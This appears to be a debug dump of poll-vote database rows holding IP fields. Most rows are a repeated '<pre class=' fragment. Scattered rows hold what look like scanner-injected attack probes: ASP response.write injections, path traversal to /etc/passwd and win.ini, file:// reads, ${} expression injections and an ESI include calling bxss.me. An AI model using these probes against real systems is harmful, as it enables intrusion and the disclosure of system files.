'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1681 => array(
'id' => '2224',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1682 => array(
'id' => '2225',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1683 => array(
'id' => '2226',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1684 => array(
'id' => '2227',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1685 => array(
'id' => '2228',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1686 => array(
'id' => '2229',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1687 => array(
'id' => '2230',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1688 => array(
'id' => '2231',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1689 => array(
'id' => '2232',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1690 => array(
'id' => '2233',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1691 => array(
'id' => '2234',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1692 => array(
'id' => '2235',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1693 => array(
'id' => '2236',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1694 => array(
'id' => '2237',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1695 => array(
'id' => '2238',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1696 => array(
'id' => '2239',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1697 => array(
'id' => '2240',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1698 => array(
'id' => '2241',
'ip' => '194.34.233.95',
'ip1' => 'response.write(9118630*9009106)',
'sondage_id' => '2'
),
(int) 1699 => array(
'id' => '2242',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1700 => array(
'id' => '2243',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1701 => array(
'id' => '2244',
'ip' => '194.34.233.95',
'ip1' => ''+response.write(9118630*9009106)+'',
'sondage_id' => '2'
),
(int) 1702 => array(
'id' => '2245',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1703 => array(
'id' => '2246',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1704 => array(
'id' => '2247',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1705 => array(
'id' => '2248',
'ip' => '194.34.233.95',
'ip1' => '"+response.write(9118630*9009106)+"',
'sondage_id' => '2'
),
(int) 1706 => array(
'id' => '2249',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1707 => array(
'id' => '2250',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1708 => array(
'id' => '2251',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1709 => array(
'id' => '2252',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1710 => array(
'id' => '2253',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1711 => array(
'id' => '2254',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1712 => array(
'id' => '2255',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1713 => array(
'id' => '2256',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1714 => array(
'id' => '2257',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1715 => array(
'id' => '2258',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1716 => array(
'id' => '2259',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1717 => array(
'id' => '2260',
'ip' => '194.34.233.95',
'ip1' => '',
'sondage_id' => '2'
),
(int) 1718 => array(
'id' => '2261',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1719 => array(
'id' => '2262',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1720 => array(
'id' => '2263',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1721 => array(
'id' => '2264',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1722 => array(
'id' => '2265',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1723 => array(
'id' => '2266',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1724 => array(
'id' => '2267',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1725 => array(
'id' => '2268',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1726 => array(
'id' => '2269',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1727 => array(
'id' => '2270',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1728 => array(
'id' => '2271',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1729 => array(
'id' => '2272',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1730 => array(
'id' => '2273',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1731 => array(
'id' => '2274',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1732 => array(
'id' => '2275',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1733 => array(
'id' => '2276',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1734 => array(
'id' => '2277',
'ip' => '194.34.233.95',
'ip1' => '<pre class=<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 1735 => array(
'id' => '2278',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1736 => array(
'id' => '2279',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1737 => array(
'id' => '2280',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1738 => array(
'id' => '2281',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1739 => array(
'id' => '2282',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1740 => array(
'id' => '2283',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1741 => array(
'id' => '2284',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1742 => array(
'id' => '2285',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1743 => array(
'id' => '2286',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1744 => array(
'id' => '2287',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1745 => array(
'id' => '2288',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1746 => array(
'id' => '2289',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1747 => array(
'id' => '2290',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1748 => array(
'id' => '2291',
'ip' => 'file:///etc/passwd',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1749 => array(
'id' => '2292',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1750 => array(
'id' => '2293',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1751 => array(
'id' => '2294',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1752 => array(
'id' => '2295',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1753 => array(
'id' => '2296',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1754 => array(
'id' => '2297',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1755 => array(
'id' => '2298',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1756 => array(
'id' => '2299',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1757 => array(
'id' => '2300',
'ip' => '../194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1758 => array(
'id' => '2301',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1759 => array(
'id' => '2302',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1760 => array(
'id' => '2303',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1761 => array(
'id' => '2304',
'ip' => '194.34.233.95',
'ip1' => '../../../../../../../../../../../../../../etc/passwd',
'sondage_id' => '2'
),
(int) 1762 => array(
'id' => '2305',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1763 => array(
'id' => '2306',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1764 => array(
'id' => '2307',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1765 => array(
'id' => '2308',
'ip' => '194.34.233.95',
'ip1' => '../../../../../../../../../../../../../../windows/win.ini',
'sondage_id' => '2'
),
(int) 1766 => array(
'id' => '2309',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1767 => array(
'id' => '2310',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1768 => array(
'id' => '2311',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1769 => array(
'id' => '2312',
'ip' => '194.34.233.95',
'ip1' => 'file:///etc/passwd',
'sondage_id' => '2'
),
(int) 1770 => array(
'id' => '2313',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1771 => array(
'id' => '2314',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1772 => array(
'id' => '2315',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1773 => array(
'id' => '2316',
'ip' => '${10000116+9999833}',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1774 => array(
'id' => '2317',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1775 => array(
'id' => '2318',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1776 => array(
'id' => '2319',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1777 => array(
'id' => '2320',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1778 => array(
'id' => '2321',
'ip' => '194.34.233.95',
'ip1' => '../<pre class=',
'sondage_id' => '2'
),
(int) 1779 => array(
'id' => '2322',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1780 => array(
'id' => '2323',
'ip' => '194.34.233.95',
'ip1' => '${10000339+10000271}',
'sondage_id' => '2'
),
(int) 1781 => array(
'id' => '2324',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1782 => array(
'id' => '2325',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1783 => array(
'id' => '2326',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1784 => array(
'id' => '2327',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1785 => array(
'id' => '2328',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1786 => array(
'id' => '2329',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1787 => array(
'id' => '2330',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1788 => array(
'id' => '2331',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1789 => array(
'id' => '2332',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1790 => array(
'id' => '2333',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1791 => array(
'id' => '2334',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1792 => array(
'id' => '2335',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1793 => array(
'id' => '2336',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1794 => array(
'id' => '2337',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1795 => array(
'id' => '2338',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1796 => array(
'id' => '2339',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1797 => array(
'id' => '2340',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1798 => array(
'id' => '2341',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1799 => array(
'id' => '2342',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1800 => array(
'id' => '2343',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1801 => array(
'id' => '2344',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1802 => array(
'id' => '2345',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1803 => array(
'id' => '2346',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1804 => array(
'id' => '2347',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1805 => array(
'id' => '2348',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1806 => array(
'id' => '2349',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1807 => array(
'id' => '2350',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1808 => array(
'id' => '2351',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1809 => array(
'id' => '2352',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1810 => array(
'id' => '2353',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1811 => array(
'id' => '2354',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1812 => array(
'id' => '2355',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1813 => array(
'id' => '2356',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1814 => array(
'id' => '2357',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1815 => array(
'id' => '2358',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1816 => array(
'id' => '2359',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1817 => array(
'id' => '2360',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1818 => array(
'id' => '2361',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1819 => array(
'id' => '2362',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1820 => array(
'id' => '2363',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1821 => array(
'id' => '2364',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1822 => array(
'id' => '2365',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1823 => array(
'id' => '2366',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1824 => array(
'id' => '2367',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1825 => array(
'id' => '2368',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1826 => array(
'id' => '2369',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1827 => array(
'id' => '2370',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1828 => array(
'id' => '2371',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1829 => array(
'id' => '2372',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1830 => array(
'id' => '2373',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1831 => array(
'id' => '2374',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1832 => array(
'id' => '2375',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1833 => array(
'id' => '2376',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1834 => array(
'id' => '2377',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1835 => array(
'id' => '2378',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1836 => array(
'id' => '2379',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1837 => array(
'id' => '2380',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1838 => array(
'id' => '2381',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1839 => array(
'id' => '2382',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1840 => array(
'id' => '2383',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1841 => array(
'id' => '2384',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1842 => array(
'id' => '2385',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1843 => array(
'id' => '2386',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1844 => array(
'id' => '2387',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1845 => array(
'id' => '2388',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1846 => array(
'id' => '2389',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1847 => array(
'id' => '2390',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1848 => array(
'id' => '2391',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1849 => array(
'id' => '2392',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1850 => array(
'id' => '2393',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1851 => array(
'id' => '2394',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1852 => array(
'id' => '2395',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1853 => array(
'id' => '2396',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1854 => array(
'id' => '2397',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1855 => array(
'id' => '2398',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1856 => array(
'id' => '2399',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1857 => array(
'id' => '2400',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1858 => array(
'id' => '2401',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1859 => array(
'id' => '2402',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1860 => array(
'id' => '2403',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1861 => array(
'id' => '2404',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1862 => array(
'id' => '2405',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1863 => array(
'id' => '2406',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1864 => array(
'id' => '2407',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1865 => array(
'id' => '2408',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1866 => array(
'id' => '2409',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1867 => array(
'id' => '2410',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1868 => array(
'id' => '2411',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1869 => array(
'id' => '2412',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1870 => array(
'id' => '2413',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1871 => array(
'id' => '2414',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1872 => array(
'id' => '2415',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1873 => array(
'id' => '2416',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1874 => array(
'id' => '2417',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1875 => array(
'id' => '2418',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1876 => array(
'id' => '2419',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1877 => array(
'id' => '2420',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1878 => array(
'id' => '2421',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1879 => array(
'id' => '2422',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1880 => array(
'id' => '2423',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1881 => array(
'id' => '2424',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1882 => array(
'id' => '2425',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1883 => array(
'id' => '2426',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1884 => array(
'id' => '2427',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1885 => array(
'id' => '2428',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1886 => array(
'id' => '2429',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1887 => array(
'id' => '2430',
'ip' => '194.34.233.95',
'ip1' => '<pre class=&n918005=v974050',
'sondage_id' => '2'
),
(int) 1888 => array(
'id' => '2431',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1889 => array(
'id' => '2432',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1890 => array(
'id' => '2433',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1891 => array(
'id' => '2434',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1892 => array(
'id' => '2435',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1893 => array(
'id' => '2436',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1894 => array(
'id' => '2437',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1895 => array(
'id' => '2438',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1896 => array(
'id' => '2439',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1897 => array(
'id' => '2440',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1898 => array(
'id' => '2441',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1899 => array(
'id' => '2442',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1900 => array(
'id' => '2443',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1901 => array(
'id' => '2444',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1902 => array(
'id' => '2445',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1903 => array(
'id' => '2446',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1904 => array(
'id' => '2447',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1905 => array(
'id' => '2448',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1906 => array(
'id' => '2449',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1907 => array(
'id' => '2450',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1908 => array(
'id' => '2451',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1909 => array(
'id' => '2452',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1910 => array(
'id' => '2453',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1911 => array(
'id' => '2454',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1912 => array(
'id' => '2455',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1913 => array(
'id' => '2456',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1914 => array(
'id' => '2457',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1915 => array(
'id' => '2458',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1916 => array(
'id' => '2459',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
